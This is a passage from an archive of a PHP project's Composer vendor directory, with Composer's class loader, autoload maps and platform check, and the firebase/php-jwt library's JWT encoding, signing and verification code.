'45b30f99ac27b5ca93cb4831afe16285f57b8221', 'type' => 'library', 'install_path' => __DIR__ . '/../guzzlehttp/psr7', 'aliases' => array(), 'dev_requirement' => false, ), 'monolog/monolog' => array( 'pretty_version' => '2.9.2', 'version' => '', 'reference' => '437cb3628f4cf6042cc10ae97fc2b8472e48ca1f', 'type' => 'library', 'install_path' => __DIR__ . '/../monolog/monolog', 'aliases' => array(), 'dev_requirement' => false, ), 'paragonie/constant_time_encoding' => array( 'pretty_version' => 'v2.6.3', 'version' => '', 'reference' => '58c3f47f650c94ec05a151692652a868995d2938', 'type' => 'library', 'install_path' => __DIR__ . '/../paragonie/constant_time_encoding', 'aliases' => array(), 'dev_requirement' => false, ), 'paragonie/random_compat' => array( 'pretty_version' => 'v9.99.100', 'version' => '', 'reference' => '996434e5492cb4c3edcb9168db6fbb1359ef965a', 'type' => 'library', 'install_path' => __DIR__ . '/../paragonie/random_compat', 'aliases' => array(), 'dev_requirement' => false, ), 'phpseclib/phpseclib' => array( 'pretty_version' => '3.0.35', 'version' => '', 'reference' => '4b1827beabce71953ca479485c0ae9c51287f2fe', 'type' => 'library', 'install_path' => __DIR__ . '/../phpseclib/phpseclib', 'aliases' => array(), 'dev_requirement' => false, ), 'psr/cache' => array( 'pretty_version' => '1.0.1', 'version' => '', 'reference' => 'd11b50ad223250cf17b86e38383413f5a6764bf8', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/cache', 'aliases' => array(), 'dev_requirement' => false, ), 'psr/http-client' => array( 'pretty_version' => '1.0.3', 'version' => '', 'reference' => 'bb5906edc1c324c9a05aa0873d40117941e5fa90', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/http-client', 'aliases' => array(), 'dev_requirement' => false, ), 'psr/http-client-implementation' => array( 'dev_requirement' => false, 'provided' => array( 0 => '1.0', ), ), 'psr/http-factory' => array( 'pretty_version' => '1.0.2', 'version' => '', 'reference' => 'e616d01114759c4c489f93b099585439f795fe35', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/http-factory', 'aliases' => array(), 'dev_requirement' => false, ), 'psr/http-factory-implementation' => array( 'dev_requirement' => false, 'provided' => array( 0 => '1.0', ), ), 'psr/http-message' => array( 'pretty_version' => '2.0', 'version' => '', 'reference' => '402d35bcb92c70c026d1a6a9883f06b2ead23d71', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/http-message', 'aliases' => array(), 'dev_requirement' => false, ), 'psr/http-message-implementation' => array( 'dev_requirement' => false, 'provided' => array( 0 => '1.0', ), ), 'psr/log' => array( 'pretty_version' => '1.1.4', 'version' => '', 'reference' => 'd49695b909c3b7628b6289db5479a1c204601f11', 'type' => 'library', 'install_path' => __DIR__ . '/../psr/log', 'aliases' => array(), 'dev_requirement' => false, ), 'psr/log-implementation' => array( 'dev_requirement' => false, 'provided' => array( 0 => '1.0.0 || 2.0.0 || 3.0.0', ), ), 'ralouphie/getallheaders' => array( 'pretty_version' => '3.0.3', 'version' => '', 'reference' => '120b605dfeb996808c31b6477290a714d356e822', 'type' => 'library', 'install_path' => __DIR__ . '/../ralouphie/getallheaders', 'aliases' => array(), 'dev_requirement' => false, ), 'symfony/deprecation-contracts' => array( 'pretty_version' => 'v2.5.2', 'version' => '', 'reference' => 'e8b495ea28c1d97b5e0c121748d6f9b53d075c66', 'type' => 'library', 'install_path' => __DIR__ . '/../symfony/deprecation-contracts', 'aliases' => array(), 'dev_requirement' => false, ), ), ); google-api/vendor/composer/ClassLoader.php000064400000037772147600400120014632 0ustar00 * Jordi Boggiano * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Composer\Autoload; /** * ClassLoader implements a PSR-0, PSR-4 and classmap class loader. * * $loader = new \Composer\Autoload\ClassLoader(); * * // register classes with namespaces * $loader->add('Symfony\Component', __DIR__.'/component'); * $loader->add('Symfony', __DIR__.'/framework'); * * // activate the autoloader * $loader->register(); * * // to enable searching the include path (eg. for PEAR packages) * $loader->setUseIncludePath(true); * * In this example, if you try to use a class in the Symfony\Component * namespace or one of its children (Symfony\Component\Console for instance), * the autoloader will first look for the class under the component/ * directory, and it will then fallback to the framework/ directory if not * found before giving up. * * This class is loosely based on the Symfony UniversalClassLoader. * * @author Fabien Potencier * @author Jordi Boggiano * @see https://www.php-fig.org/psr/psr-0/ * @see https://www.php-fig.org/psr/psr-4/ */ class ClassLoader { /** @var \Closure(string):void */ private static $includeFile; /** @var string|null */ private $vendorDir; // PSR-4 /** * @var array> */ private $prefixLengthsPsr4 = array(); /** * @var array> */ private $prefixDirsPsr4 = array(); /** * @var list */ private $fallbackDirsPsr4 = array(); // PSR-0 /** * List of PSR-0 prefixes * * Structured as array('F (first letter)' => array('Foo\Bar (full prefix)' => array('path', 'path2'))) * * @var array>> */ private $prefixesPsr0 = array(); /** * @var list */ private $fallbackDirsPsr0 = array(); /** @var bool */ private $useIncludePath = false; /** * @var array */ private $classMap = array(); /** @var bool */ private $classMapAuthoritative = false; /** * @var array */ private $missingClasses = array(); /** @var string|null */ private $apcuPrefix; /** * @var array */ private static $registeredLoaders = array(); /** * @param string|null $vendorDir */ public function __construct($vendorDir = null) { $this->vendorDir = $vendorDir; self::initializeIncludeClosure(); } /** * @return array> */ public function getPrefixes() { if (!empty($this->prefixesPsr0)) { return call_user_func_array('array_merge', array_values($this->prefixesPsr0)); } return array(); } /** * @return array> */ public function getPrefixesPsr4() { return $this->prefixDirsPsr4; } /** * @return list */ public function getFallbackDirs() { return $this->fallbackDirsPsr0; } /** * @return list */ public function getFallbackDirsPsr4() { return $this->fallbackDirsPsr4; } /** * @return array Array of classname => path */ public function getClassMap() { return $this->classMap; } /** * @param array $classMap Class to filename map * * @return void */ public function addClassMap(array $classMap) { if ($this->classMap) { $this->classMap = array_merge($this->classMap, $classMap); } else { $this->classMap = $classMap; } } /** * Registers a set of PSR-0 directories for a given prefix, either * appending or prepending to the ones previously set for this prefix. * * @param string $prefix The prefix * @param list|string $paths The PSR-0 root directories * @param bool $prepend Whether to prepend the directories * * @return void */ public function add($prefix, $paths, $prepend = false) { $paths = (array) $paths; if (!$prefix) { if ($prepend) { $this->fallbackDirsPsr0 = array_merge( $paths, $this->fallbackDirsPsr0 ); } else { $this->fallbackDirsPsr0 = array_merge( $this->fallbackDirsPsr0, $paths ); } return; } $first = $prefix[0]; if (!isset($this->prefixesPsr0[$first][$prefix])) { $this->prefixesPsr0[$first][$prefix] = $paths; return; } if ($prepend) { $this->prefixesPsr0[$first][$prefix] = array_merge( $paths, $this->prefixesPsr0[$first][$prefix] ); } else { $this->prefixesPsr0[$first][$prefix] = array_merge( $this->prefixesPsr0[$first][$prefix], $paths ); } } /** * Registers a set of PSR-4 directories for a given namespace, either * appending or prepending to the ones previously set for this namespace. * * @param string $prefix The prefix/namespace, with trailing '\\' * @param list|string $paths The PSR-4 base directories * @param bool $prepend Whether to prepend the directories * * @throws \InvalidArgumentException * * @return void */ public function addPsr4($prefix, $paths, $prepend = false) { $paths = (array) $paths; if (!$prefix) { // Register directories for the root namespace. if ($prepend) { $this->fallbackDirsPsr4 = array_merge( $paths, $this->fallbackDirsPsr4 ); } else { $this->fallbackDirsPsr4 = array_merge( $this->fallbackDirsPsr4, $paths ); } } elseif (!isset($this->prefixDirsPsr4[$prefix])) { // Register directories for a new namespace. $length = strlen($prefix); if ('\\' !== $prefix[$length - 1]) { throw new \InvalidArgumentException("A non-empty PSR-4 prefix must end with a namespace separator."); } $this->prefixLengthsPsr4[$prefix[0]][$prefix] = $length; $this->prefixDirsPsr4[$prefix] = $paths; } elseif ($prepend) { // Prepend directories for an already registered namespace. $this->prefixDirsPsr4[$prefix] = array_merge( $paths, $this->prefixDirsPsr4[$prefix] ); } else { // Append directories for an already registered namespace. $this->prefixDirsPsr4[$prefix] = array_merge( $this->prefixDirsPsr4[$prefix], $paths ); } } /** * Registers a set of PSR-0 directories for a given prefix, * replacing any others previously set for this prefix. * * @param string $prefix The prefix * @param list|string $paths The PSR-0 base directories * * @return void */ public function set($prefix, $paths) { if (!$prefix) { $this->fallbackDirsPsr0 = (array) $paths; } else { $this->prefixesPsr0[$prefix[0]][$prefix] = (array) $paths; } } /** * Registers a set of PSR-4 directories for a given namespace, * replacing any others previously set for this namespace. * * @param string $prefix The prefix/namespace, with trailing '\\' * @param list|string $paths The PSR-4 base directories * * @throws \InvalidArgumentException * * @return void */ public function setPsr4($prefix, $paths) { if (!$prefix) { $this->fallbackDirsPsr4 = (array) $paths; } else { $length = strlen($prefix); if ('\\' !== $prefix[$length - 1]) { throw new \InvalidArgumentException("A non-empty PSR-4 prefix must end with a namespace separator."); } $this->prefixLengthsPsr4[$prefix[0]][$prefix] = $length; $this->prefixDirsPsr4[$prefix] = (array) $paths; } } /** * Turns on searching the include path for class files. * * @param bool $useIncludePath * * @return void */ public function setUseIncludePath($useIncludePath) { $this->useIncludePath = $useIncludePath; } /** * Can be used to check if the autoloader uses the include path to check * for classes. * * @return bool */ public function getUseIncludePath() { return $this->useIncludePath; } /** * Turns off searching the prefix and fallback directories for classes * that have not been registered with the class map. * * @param bool $classMapAuthoritative * * @return void */ public function setClassMapAuthoritative($classMapAuthoritative) { $this->classMapAuthoritative = $classMapAuthoritative; } /** * Should class lookup fail if not found in the current class map? * * @return bool */ public function isClassMapAuthoritative() { return $this->classMapAuthoritative; } /** * APCu prefix to use to cache found/not-found classes, if the extension is enabled. * * @param string|null $apcuPrefix * * @return void */ public function setApcuPrefix($apcuPrefix) { $this->apcuPrefix = function_exists('apcu_fetch') && filter_var(ini_get('apc.enabled'), FILTER_VALIDATE_BOOLEAN) ? $apcuPrefix : null; } /** * The APCu prefix in use, or null if APCu caching is not enabled. * * @return string|null */ public function getApcuPrefix() { return $this->apcuPrefix; } /** * Registers this instance as an autoloader. * * @param bool $prepend Whether to prepend the autoloader or not * * @return void */ public function register($prepend = false) { spl_autoload_register(array($this, 'loadClass'), true, $prepend); if (null === $this->vendorDir) { return; } if ($prepend) { self::$registeredLoaders = array($this->vendorDir => $this) + self::$registeredLoaders; } else { unset(self::$registeredLoaders[$this->vendorDir]); self::$registeredLoaders[$this->vendorDir] = $this; } } /** * Unregisters this instance as an autoloader. * * @return void */ public function unregister() { spl_autoload_unregister(array($this, 'loadClass')); if (null !== $this->vendorDir) { unset(self::$registeredLoaders[$this->vendorDir]); } } /** * Loads the given class or interface. * * @param string $class The name of the class * @return true|null True if loaded, null otherwise */ public function loadClass($class) { if ($file = $this->findFile($class)) { $includeFile = self::$includeFile; $includeFile($file); return true; } return null; } /** * Finds the path to the file where the class is defined. * * @param string $class The name of the class * * @return string|false The path if found, false otherwise */ public function findFile($class) { // class map lookup if (isset($this->classMap[$class])) { return $this->classMap[$class]; } if ($this->classMapAuthoritative || isset($this->missingClasses[$class])) { return false; } if (null !== $this->apcuPrefix) { $file = apcu_fetch($this->apcuPrefix.$class, $hit); if ($hit) { return $file; } } $file = $this->findFileWithExtension($class, '.php'); // Search for Hack files if we are running on HHVM if (false === $file && defined('HHVM_VERSION')) { $file = $this->findFileWithExtension($class, '.hh'); } if (null !== $this->apcuPrefix) { apcu_add($this->apcuPrefix.$class, $file); } if (false === $file) { // Remember that this class does not exist. $this->missingClasses[$class] = true; } return $file; } /** * Returns the currently registered loaders keyed by their corresponding vendor directories. * * @return array */ public static function getRegisteredLoaders() { return self::$registeredLoaders; } /** * @param string $class * @param string $ext * @return string|false */ private function findFileWithExtension($class, $ext) { // PSR-4 lookup $logicalPathPsr4 = strtr($class, '\\', DIRECTORY_SEPARATOR) . $ext; $first = $class[0]; if (isset($this->prefixLengthsPsr4[$first])) { $subPath = $class; while (false !== $lastPos = strrpos($subPath, '\\')) { $subPath = substr($subPath, 0, $lastPos); $search = $subPath . '\\'; if (isset($this->prefixDirsPsr4[$search])) { $pathEnd = DIRECTORY_SEPARATOR . substr($logicalPathPsr4, $lastPos + 1); foreach ($this->prefixDirsPsr4[$search] as $dir) { if (file_exists($file = $dir . $pathEnd)) { return $file; } } } } } // PSR-4 fallback dirs foreach ($this->fallbackDirsPsr4 as $dir) { if (file_exists($file = $dir . DIRECTORY_SEPARATOR . $logicalPathPsr4)) { return $file; } } // PSR-0 lookup if (false !== $pos = strrpos($class, '\\')) { // namespaced class name $logicalPathPsr0 = substr($logicalPathPsr4, 0, $pos + 1) . strtr(substr($logicalPathPsr4, $pos + 1), '_', DIRECTORY_SEPARATOR); } else { // PEAR-like class name $logicalPathPsr0 = strtr($class, '_', DIRECTORY_SEPARATOR) . $ext; } if (isset($this->prefixesPsr0[$first])) { foreach ($this->prefixesPsr0[$first] as $prefix => $dirs) { if (0 === strpos($class, $prefix)) { foreach ($dirs as $dir) { if (file_exists($file = $dir . DIRECTORY_SEPARATOR . $logicalPathPsr0)) { return $file; } } } } } // PSR-0 fallback dirs foreach ($this->fallbackDirsPsr0 as $dir) { if (file_exists($file = $dir . DIRECTORY_SEPARATOR . $logicalPathPsr0)) { return $file; } } // PSR-0 include paths. if ($this->useIncludePath && $file = stream_resolve_include_path($logicalPathPsr0)) { return $file; } return false; } /** * @return void */ private static function initializeIncludeClosure() { if (self::$includeFile !== null) { return; } /** * Scope isolated include. * * Prevents access to $this/self from included files. * * @param string $file * @return void */ self::$includeFile = \Closure::bind(static function($file) { include $file; }, null, null); } } google-api/vendor/composer/platform_check.php000064400000001635147600400120015404 0ustar00= 70400)) { $issues[] = 'Your Composer dependencies require a PHP version ">= 7.4.0". You are running ' . PHP_VERSION . '.'; } if ($issues) { if (!headers_sent()) { header('HTTP/1.1 500 Internal Server Error'); } if (!ini_get('display_errors')) { if (PHP_SAPI === 'cli' || PHP_SAPI === 'phpdbg') { fwrite(STDERR, 'Composer detected issues in your platform:' . PHP_EOL.PHP_EOL . implode(PHP_EOL, $issues) . PHP_EOL.PHP_EOL); } elseif (!headers_sent()) { echo 'Composer detected issues in your platform:' . PHP_EOL.PHP_EOL . str_replace('You are running '.PHP_VERSION.'.', '', implode(PHP_EOL, $issues)) . PHP_EOL.PHP_EOL; } } trigger_error( 'Composer detected issues in your platform: ' . implode(' ', $issues), E_USER_ERROR ); } google-api/vendor/composer/autoload_namespaces.php000064400000000213147600400120016421 0ustar00 __DIR__ . '/..' . '/ralouphie/getallheaders/src/getallheaders.php', '6e3fae29631ef280660b3cdad06f25a8' => __DIR__ . '/..' . '/symfony/deprecation-contracts/function.php', '37a3dc5111fe8f707ab4c132ef1dbc62' => __DIR__ . '/..' . '/guzzlehttp/guzzle/src/functions_include.php', '1f87db08236948d07391152dccb70f04' => __DIR__ . '/..' . '/google/apiclient-services/autoload.php', 'decc78cc4436b1292c6c0d151b19445c' => __DIR__ . '/..' . '/phpseclib/phpseclib/phpseclib/bootstrap.php', 'a8d3953fd9959404dd22d3dfcd0a79f0' => __DIR__ . '/../..' . '/src/aliases.php', ); public static $prefixLengthsPsr4 = array ( 'p' => array ( 'phpseclib3\\' => 11, ), 'P' => array ( 'Psr\\Log\\' => 8, 'Psr\\Http\\Message\\' => 17, 'Psr\\Http\\Client\\' => 16, 'Psr\\Cache\\' => 10, 'ParagonIE\\ConstantTime\\' => 23, ), 'M' => array ( 'Monolog\\' => 8, ), 'G' => array ( 'GuzzleHttp\\Psr7\\' => 16, 'GuzzleHttp\\Promise\\' => 19, 'GuzzleHttp\\' => 11, 'Google\\Service\\' => 15, 'Google\\Auth\\' => 12, 'Google\\' => 7, ), 'F' => array ( 'Firebase\\JWT\\' => 13, ), ); public static $prefixDirsPsr4 = array ( 'phpseclib3\\' => array ( 0 => __DIR__ . '/..' . '/phpseclib/phpseclib/phpseclib', ), 'Psr\\Log\\' => array ( 0 => __DIR__ . '/..' . '/psr/log/Psr/Log', ), 'Psr\\Http\\Message\\' => array ( 0 => __DIR__ . '/..' . '/psr/http-message/src', 1 => __DIR__ . '/..' . '/psr/http-factory/src', ), 'Psr\\Http\\Client\\' => array ( 0 => __DIR__ . '/..' . '/psr/http-client/src', ), 'Psr\\Cache\\' => array ( 0 => __DIR__ . '/..' . '/psr/cache/src', ), 'ParagonIE\\ConstantTime\\' => array ( 0 => __DIR__ . '/..' . '/paragonie/constant_time_encoding/src', ), 'Monolog\\' => array ( 0 => __DIR__ . '/..' . '/monolog/monolog/src/Monolog', ), 'GuzzleHttp\\Psr7\\' => array ( 0 => __DIR__ . '/..' . '/guzzlehttp/psr7/src', ), 'GuzzleHttp\\Promise\\' => array ( 0 => __DIR__ . '/..' . '/guzzlehttp/promises/src', ), 'GuzzleHttp\\' => array ( 0 => __DIR__ . '/..' . '/guzzlehttp/guzzle/src', ), 'Google\\Service\\' => array ( 0 => __DIR__ . '/..' . '/google/apiclient-services/src', ), 'Google\\Auth\\' => array ( 0 => __DIR__ . '/..' . '/google/auth/src', ), 'Google\\' => array ( 0 => __DIR__ . '/../..' . '/src', ), 'Firebase\\JWT\\' => array ( 0 => __DIR__ . '/..' . '/firebase/php-jwt/src', ), ); public static $classMap = array ( 'Composer\\InstalledVersions' => __DIR__ . '/..' . '/composer/InstalledVersions.php', 'Google_AccessToken_Revoke' => __DIR__ . '/../..' . '/src/aliases.php', 'Google_AccessToken_Verify' => __DIR__ . '/../..' . '/src/aliases.php', 'Google_AuthHandler_AuthHandlerFactory' => __DIR__ . '/../..' . '/src/aliases.php', 'Google_AuthHandler_Guzzle6AuthHandler' => __DIR__ . '/../..' . '/src/aliases.php', 'Google_AuthHandler_Guzzle7AuthHandler' => __DIR__ . '/../..' . '/src/aliases.php', 'Google_Client' => __DIR__ . '/../..' . '/src/aliases.php', 'Google_Collection' => __DIR__ . '/../..' . '/src/aliases.php', 'Google_Exception' => __DIR__ . '/../..' . '/src/aliases.php', 'Google_Http_Batch' => __DIR__ . '/../..' . '/src/aliases.php', 'Google_Http_MediaFileUpload' => __DIR__ . '/../..' . '/src/aliases.php', 'Google_Http_REST' => __DIR__ . '/../..' . '/src/aliases.php', 'Google_Model' => __DIR__ . '/../..' . '/src/aliases.php', 'Google_Service' => __DIR__ . '/../..' . '/src/aliases.php', 'Google_Service_Exception' => __DIR__ . '/../..' . '/src/aliases.php', 'Google_Service_Resource' => __DIR__ . '/../..' . '/src/aliases.php', 'Google_Task_Composer' => __DIR__ . '/../..' . '/src/aliases.php', 'Google_Task_Exception' => __DIR__ . '/../..' . '/src/aliases.php', 'Google_Task_Retryable' => __DIR__ . '/../..' . '/src/aliases.php', 'Google_Task_Runner' => __DIR__ . '/../..' . '/src/aliases.php', 'Google_Utils_UriTemplate' => __DIR__ . '/../..' . '/src/aliases.php', ); public static function getInitializer(ClassLoader $loader) { return \Closure::bind(function () use ($loader) { $loader->prefixLengthsPsr4 = ComposerStaticInitf4d1a427d9ee01217ccf8dd65ee36eea::$prefixLengthsPsr4; $loader->prefixDirsPsr4 = ComposerStaticInitf4d1a427d9ee01217ccf8dd65ee36eea::$prefixDirsPsr4; $loader->classMap = ComposerStaticInitf4d1a427d9ee01217ccf8dd65ee36eea::$classMap; }, null, ClassLoader::class); } } google-api/vendor/firebase/php-jwt/src/JWT.php000064400000057201147600400120015200 0ustar00 * @author Anant Narayanan * @license http://opensource.org/licenses/BSD-3-Clause 3-clause BSD * @link https://github.com/firebase/php-jwt */ class JWT { private const ASN1_INTEGER = 0x02; private const ASN1_SEQUENCE = 0x10; private const ASN1_BIT_STRING = 0x03; /** * When checking nbf, iat or expiration times, * we want to provide some extra leeway time to * account for clock skew. * * @var int */ public static $leeway = 0; /** * Allow the current timestamp to be specified. * Useful for fixing a value within unit testing. * Will default to PHP time() value if null. * * @var ?int */ public static $timestamp = null; /** * @var array */ public static $supported_algs = [ 'ES384' => ['openssl', 'SHA384'], 'ES256' => ['openssl', 'SHA256'], 'ES256K' => ['openssl', 'SHA256'], 'HS256' => ['hash_hmac', 'SHA256'], 'HS384' => ['hash_hmac', 'SHA384'], 'HS512' => ['hash_hmac', 'SHA512'], 'RS256' => ['openssl', 'SHA256'], 'RS384' => ['openssl', 'SHA384'], 'RS512' => ['openssl', 'SHA512'], 'EdDSA' => ['sodium_crypto', 'EdDSA'], ]; /** * Decodes a JWT string into a PHP object. * * @param string $jwt The JWT * @param Key|ArrayAccess|array $keyOrKeyArray The Key or associative array of key IDs * (kid) to Key objects. * If the algorithm used is asymmetric, this is * the public key. * Each Key object contains an algorithm and * matching key. * Supported algorithms are 'ES384','ES256', * 'HS256', 'HS384', 'HS512', 'RS256', 'RS384' * and 'RS512'. * @param stdClass $headers Optional. Populates stdClass with headers. * * @return stdClass The JWT's payload as a PHP object * * @throws InvalidArgumentException Provided key/key-array was empty or malformed * @throws DomainException Provided JWT is malformed * @throws UnexpectedValueException Provided JWT was invalid * @throws SignatureInvalidException Provided JWT was invalid because the signature verification failed * @throws BeforeValidException Provided JWT is trying to be used before it's eligible as defined by 'nbf' * @throws BeforeValidException Provided JWT is trying to be used before it's been created as defined by 'iat' * @throws ExpiredException Provided JWT has since expired, as defined by the 'exp' claim * * @uses jsonDecode * @uses urlsafeB64Decode */ public static function decode( string $jwt, $keyOrKeyArray, stdClass &$headers = null ): stdClass { // Validate JWT $timestamp = \is_null(static::$timestamp) ? \time() : static::$timestamp; if (empty($keyOrKeyArray)) { throw new InvalidArgumentException('Key may not be empty'); } $tks = \explode('.', $jwt); if (\count($tks) !== 3) { throw new UnexpectedValueException('Wrong number of segments'); } list($headb64, $bodyb64, $cryptob64) = $tks; $headerRaw = static::urlsafeB64Decode($headb64); if (null === ($header = static::jsonDecode($headerRaw))) { throw new UnexpectedValueException('Invalid header encoding'); } if ($headers !== null) { $headers = $header; } $payloadRaw = static::urlsafeB64Decode($bodyb64); if (null === ($payload = static::jsonDecode($payloadRaw))) { throw new UnexpectedValueException('Invalid claims encoding'); } if (\is_array($payload)) { // prevent PHP Fatal Error in edge-cases when payload is empty array $payload = (object) $payload; } if (!$payload instanceof stdClass) { throw new UnexpectedValueException('Payload must be a JSON object'); } $sig = static::urlsafeB64Decode($cryptob64); if (empty($header->alg)) { throw new UnexpectedValueException('Empty algorithm'); } if (empty(static::$supported_algs[$header->alg])) { throw new UnexpectedValueException('Algorithm not supported'); } $key = self::getKey($keyOrKeyArray, property_exists($header, 'kid') ? $header->kid : null); // Check the algorithm if (!self::constantTimeEquals($key->getAlgorithm(), $header->alg)) { // See issue #351 throw new UnexpectedValueException('Incorrect key for this algorithm'); } if (\in_array($header->alg, ['ES256', 'ES256K', 'ES384'], true)) { // OpenSSL expects an ASN.1 DER sequence for ES256/ES256K/ES384 signatures $sig = self::signatureToDER($sig); } if (!self::verify("{$headb64}.{$bodyb64}", $sig, $key->getKeyMaterial(), $header->alg)) { throw new SignatureInvalidException('Signature verification failed'); } // Check the nbf if it is defined. This is the time that the // token can actually be used. If it's not yet that time, abort. if (isset($payload->nbf) && floor($payload->nbf) > ($timestamp + static::$leeway)) { $ex = new BeforeValidException( 'Cannot handle token with nbf prior to ' . \date(DateTime::ISO8601, (int) $payload->nbf) ); $ex->setPayload($payload); throw $ex; } // Check that this token has been created before 'now'. This prevents // using tokens that have been created for later use (and haven't // correctly used the nbf claim). if (!isset($payload->nbf) && isset($payload->iat) && floor($payload->iat) > ($timestamp + static::$leeway)) { $ex = new BeforeValidException( 'Cannot handle token with iat prior to ' . \date(DateTime::ISO8601, (int) $payload->iat) ); $ex->setPayload($payload); throw $ex; } // Check if this token has expired. if (isset($payload->exp) && ($timestamp - static::$leeway) >= $payload->exp) { $ex = new ExpiredException('Expired token'); $ex->setPayload($payload); throw $ex; } return $payload; } /** * Converts and signs a PHP array into a JWT string. * * @param array $payload PHP array * @param string|resource|OpenSSLAsymmetricKey|OpenSSLCertificate $key The secret key. * @param string $alg Supported algorithms are 'ES384','ES256', 'ES256K', 'HS256', * 'HS384', 'HS512', 'RS256', 'RS384', and 'RS512' * @param string $keyId * @param array $head An array with header elements to attach * * @return string A signed JWT * * @uses jsonEncode * @uses urlsafeB64Encode */ public static function encode( array $payload, $key, string $alg, string $keyId = null, array $head = null ): string { $header = ['typ' => 'JWT']; if (isset($head) && \is_array($head)) { $header = \array_merge($header, $head); } $header['alg'] = $alg; if ($keyId !== null) { $header['kid'] = $keyId; } $segments = []; $segments[] = static::urlsafeB64Encode((string) static::jsonEncode($header)); $segments[] = static::urlsafeB64Encode((string) static::jsonEncode($payload)); $signing_input = \implode('.', $segments); $signature = static::sign($signing_input, $key, $alg); $segments[] = static::urlsafeB64Encode($signature); return \implode('.', $segments); } /** * Sign a string with a given key and algorithm. * * @param string $msg The message to sign * @param string|resource|OpenSSLAsymmetricKey|OpenSSLCertificate $key The secret key. * @param string $alg Supported algorithms are 'EdDSA', 'ES384', 'ES256', 'ES256K', 'HS256', * 'HS384', 'HS512', 'RS256', 'RS384', and 'RS512' * * @return string An encrypted message * * @throws DomainException Unsupported algorithm or bad key was specified */ public static function sign( string $msg, $key, string $alg ): string { if (empty(static::$supported_algs[$alg])) { throw new DomainException('Algorithm not supported'); } list($function, $algorithm) = static::$supported_algs[$alg]; switch ($function) { case 'hash_hmac': if (!\is_string($key)) { throw new InvalidArgumentException('key must be a string when using hmac'); } return \hash_hmac($algorithm, $msg, $key, true); case 'openssl': $signature = ''; $success = \openssl_sign($msg, $signature, $key, $algorithm); // @phpstan-ignore-line if (!$success) { throw new DomainException('OpenSSL unable to sign data'); } if ($alg === 'ES256' || $alg === 'ES256K') { $signature = self::signatureFromDER($signature, 256); } elseif ($alg === 'ES384') { $signature = self::signatureFromDER($signature, 384); } return $signature; case 'sodium_crypto': if (!\function_exists('sodium_crypto_sign_detached')) { throw new DomainException('libsodium is not available'); } if (!\is_string($key)) { throw new InvalidArgumentException('key must be a string when using EdDSA'); } try { // The last non-empty line is used as the key. $lines = array_filter(explode("\n", $key)); $key = base64_decode((string) end($lines)); if (\strlen($key) === 0) { throw new DomainException('Key cannot be empty string'); } return sodium_crypto_sign_detached($msg, $key); } catch (Exception $e) { throw new DomainException($e->getMessage(), 0, $e); } } throw new DomainException('Algorithm not supported'); } /** * Verify a signature with the message, key and method. Not all methods * are symmetric, so we must have a separate verify and sign method. * * @param string $msg The original message (header and body) * @param string $signature The original signature * @param string|resource|OpenSSLAsymmetricKey|OpenSSLCertificate $keyMaterial For Ed*, ES*, HS*, a string key works. for RS*, must be an instance of OpenSSLAsymmetricKey * @param string $alg The algorithm * * @return bool * * @throws DomainException Invalid Algorithm, bad key, or OpenSSL failure */ private static function verify( string $msg, string $signature, $keyMaterial, string $alg ): bool { if (empty(static::$supported_algs[$alg])) { throw new DomainException('Algorithm not supported'); } list($function, $algorithm) = static::$supported_algs[$alg]; switch ($function) { case 'openssl': $success = \openssl_verify($msg, $signature, $keyMaterial, $algorithm); // @phpstan-ignore-line if ($success === 1) { return true; } if ($success === 0) { return false; } // returns 1 on success, 0 on failure, -1 on error. throw new DomainException( 'OpenSSL error: ' . \openssl_error_string() ); case 'sodium_crypto': if (!\function_exists('sodium_crypto_sign_verify_detached')) { throw new DomainException('libsodium is not available'); } if (!\is_string($keyMaterial)) { throw new InvalidArgumentException('key must be a string when using EdDSA'); } try { // The last non-empty line is used as the key. $lines = array_filter(explode("\n", $keyMaterial)); $key = base64_decode((string) end($lines)); if (\strlen($key) === 0) { throw new DomainException('Key cannot be empty string'); } if (\strlen($signature) === 0) { throw new DomainException('Signature cannot be empty string'); } return sodium_crypto_sign_verify_detached($signature, $msg, $key); } catch (Exception $e) { throw new DomainException($e->getMessage(), 0, $e); } case 'hash_hmac': default: if (!\is_string($keyMaterial)) { throw new InvalidArgumentException('key must be a string when using hmac'); } $hash = \hash_hmac($algorithm, $msg, $keyMaterial, true); return self::constantTimeEquals($hash, $signature); } } /** * Decode a JSON string into a PHP object. * * @param string $input JSON string * * @return mixed The decoded JSON string * * @throws DomainException Provided string was invalid JSON */ public static function jsonDecode(string $input) { $obj = \json_decode($input, false, 512, JSON_BIGINT_AS_STRING); if ($errno = \json_last_error()) { self::handleJsonError($errno); } elseif ($obj === null && $input !== 'null') { throw new DomainException('Null result with non-null input'); } return $obj; } /** * Encode a PHP array into a JSON string. * * @param array $input A PHP array * * @return string JSON representation of the PHP array * * @throws DomainException Provided object could not be encoded to valid JSON */ public static function jsonEncode(array $input): string { if (PHP_VERSION_ID >= 50400) { $json = \json_encode($input, \JSON_UNESCAPED_SLASHES); } else { // PHP 5.3 only $json = \json_encode($input); } if ($errno = \json_last_error()) { self::handleJsonError($errno); } elseif ($json === 'null') { throw new DomainException('Null result with non-null input'); } if ($json === false) { throw new DomainException('Provided object could not be encoded to valid JSON'); } return $json; } /** * Decode a string with URL-safe Base64. * * @param string $input A Base64 encoded string * * @return string A decoded string * * @throws InvalidArgumentException invalid base64 characters */ public static function urlsafeB64Decode(string $input): string { return \base64_decode(self::convertBase64UrlToBase64($input)); } /** * Convert a string in the base64url (URL-safe Base64) encoding to standard base64. * * @param string $input A Base64 encoded string with URL-safe characters (-_ and no padding) * * @return string A Base64 encoded string with standard characters (+/) and padding (=), when * needed. * * @see https://www.rfc-editor.org/rfc/rfc4648 */ public static function convertBase64UrlToBase64(string $input): string { $remainder = \strlen($input) % 4; if ($remainder) { $padlen = 4 - $remainder; $input .= \str_repeat('=', $padlen); } return \strtr($input, '-_', '+/'); } /** * Encode a string with URL-safe Base64. * * @param string $input The string you want encoded * * @return string The base64 encode of what you passed in */ public static function urlsafeB64Encode(string $input): string { return \str_replace('=', '', \strtr(\base64_encode($input), '+/', '-_')); } /** * Determine if an algorithm has been provided for each Key * * @param Key|ArrayAccess|array $keyOrKeyArray * @param string|null $kid * * @throws UnexpectedValueException * * @return Key */ private static function getKey( $keyOrKeyArray, ?string $kid ): Key { if ($keyOrKeyArray instanceof Key) { return $keyOrKeyArray; } if (empty($kid) && $kid !== '0') { throw new UnexpectedValueException('"kid" empty, unable to lookup correct 